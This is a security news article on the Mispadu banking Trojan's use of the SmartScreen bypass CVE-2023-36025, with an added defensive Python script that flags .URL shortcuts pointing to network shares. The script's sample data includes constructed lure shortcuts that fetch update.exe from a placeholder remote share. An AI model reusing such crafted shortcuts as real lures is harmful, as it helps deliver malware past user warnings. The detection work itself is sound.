Mispadu Banking Trojan Exploits Patched Windows SmartScreen Flaw
February 5, 2024
The Mispadu banking Trojan, first observed in 2019, has been updated to exploit a previously patched Windows SmartScreen security bypass flaw in a campaign targeting users in Mexico. The new variant is propagated via phishing emails; Mispadu itself belongs to a larger family of Latin American banking malware. According to a report published by Palo Alto Networks Unit 42, Mispadu has harvested 90,000 bank account credentials since August 2022.
The malware leverages CVE-2023-36025, a high-severity bypass flaw in Windows SmartScreen, which was addressed by Microsoft in November 2023. As security researchers Daniela Shalev and Josh Grunzweig explained, "This exploit revolves around the creation of a specifically crafted internet shortcut file (.URL) or a hyperlink pointing to malicious files that can bypass SmartScreen's warnings. The bypass is simple and relies on a parameter that references a network share, rather than a URL. The crafted .URL file contains a link to a threat actor's network share with a malicious binary."
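The detail that matters for defenders is the shape of the lure: an ordinary INI-style `.URL` file whose `URL=` value is a UNC or `file://` path to a remote share rather than a web address. The following is an added example, not code from Unit 42 or the Mispadu campaign; it parses `.URL` content with Python's `configparser` and flags shortcuts whose target resolves to a network share. The sample shortcut contents are constructed for illustration, and the address `192.0.2.10` is a documentation range placeholder, not an indicator from the report.

```python
import configparser
import os
import re
from urllib.parse import urlparse

# Extensions that, when reached via a remote share, are worth escalating.
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".msi", ".bat", ".cmd",
                   ".js", ".vbs", ".hta", ".lnk", ".ps1"}

# Constructed sample .URL files (hypothetical; not campaign artifacts).
SAMPLES = {
    "benign.url":      "[InternetShortcut]\nURL=https://example.com/\n",
    "unc_share.url":   "[InternetShortcut]\nURL=\\\\192.0.2.10\\share\\update.exe\n",
    "file_scheme.url": "[InternetShortcut]\nURL=file://192.0.2.10/share/update.exe\nIconIndex=0\n",
    "webdav.url":      "[InternetShortcut]\nURL=\\\\192.0.2.10@80\\DavWWWRoot\\update.exe\n",
    "local_file.url":  "[InternetShortcut]\nURL=file:///C:/Users/Public/readme.txt\n",
}


def parse_url_target(text):
    """Return the URL= value of an [InternetShortcut] section, or None if absent/invalid."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error:
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    return cp["InternetShortcut"].get("URL")  # option lookup is case-insensitive


def target_is_remote_share(target):
    """True when the shortcut target is a UNC path or a file:// URL with a remote host."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return True  # raw UNC path, including WebDAV forms such as \\host@80\DavWWWRoot\...
    parsed = urlparse(t)
    if parsed.scheme.lower() == "file":
        # file:///C:/... has an empty netloc and is local; file://host/share/... is remote
        return parsed.netloc.lower() not in ("", "localhost")
    return False


def target_extension(target):
    """Extension of the last path component, ignoring query/fragment."""
    tail = re.split(r"[\\/]", target.strip())[-1]
    tail = tail.split("?", 1)[0].split("#", 1)[0]
    return os.path.splitext(tail)[1].lower()


def assess_url_file(text):
    """Classify .URL content as 'invalid', 'ok', or 'suspicious' with a reason."""
    target = parse_url_target(text)
    if target is None:
        return {"target": None, "verdict": "invalid", "reason": "no [InternetShortcut] URL= value"}
    remote = target_is_remote_share(target)
    executable = target_extension(target) in EXEC_EXTENSIONS
    if remote:
        reason = "target is a network share"
        if executable:
            reason += " and points at an executable"
        return {"target": target, "verdict": "suspicious", "reason": reason}
    return {"target": target, "verdict": "ok", "reason": "target is a web URL or local file"}


def scan_samples(samples):
    """Run the check over a name -> content mapping; returns name -> verdict."""
    return {name: assess_url_file(content)["verdict"] for name, content in samples.items()}


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        result = assess_url_file(content)
        print(f"{name:17} {result['verdict']:10} {result['reason']}")
```

This is a triage filter for mail gateways or sandbox post-processing, not a replacement for the November 2023 patch: it only reads the shortcut text and does not evaluate whether Mark of the Web would actually be propagated on a given host.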
Once launched, Mispadu selectively targets victims based on their geographic location and system configuration, then establishes contact with a command-and-control (C2) server for data exfiltration. In recent months, the same Windows flaw has been exploited by multiple cybercrime groups to deliver DarkGate and the Phemedrone Stealer. Mexico has also been a prime target for several campaigns distributing information stealers and remote access trojans such as AllaKore RAT, AsyncRAT, and Babylon RAT.
A financially-motivated group known as TA558 has been attacking the hospitality and travel sectors in the Latin American region since 2018. In addition, the Russian e-crime group known as FIN7 has been using DICELOADER, a custom downloader, delivered via malicious USB drives. The French cybersecurity firm Sekoia detailed the inner workings of DICELOADER and noted its sophisticated obfuscation methods to conceal the C2 IP addresses and the network communications.
Finally, AhnLab discovered two new malicious cryptocurrency mining campaigns that use booby-trapped archives and game hacks to deploy miner malware that mines Monero and Zephyr.
Related News
- Phemedrone Malware Campaign Exploits Windows SmartScreen Bypass Vulnerability
- Nim-Based Malware Delivered via Phishing Campaign Using Decoy Microsoft Word Documents
- BattleRoyal Hackers Employ Multiple Tactics to Deploy DarkGate RAT
- Public Release of PoC Exploit for Critical Windows Defender Bypass
- Windows Zero-Day CVE-2023-36025 Vulnerability: PoC Exploit Published by Researchers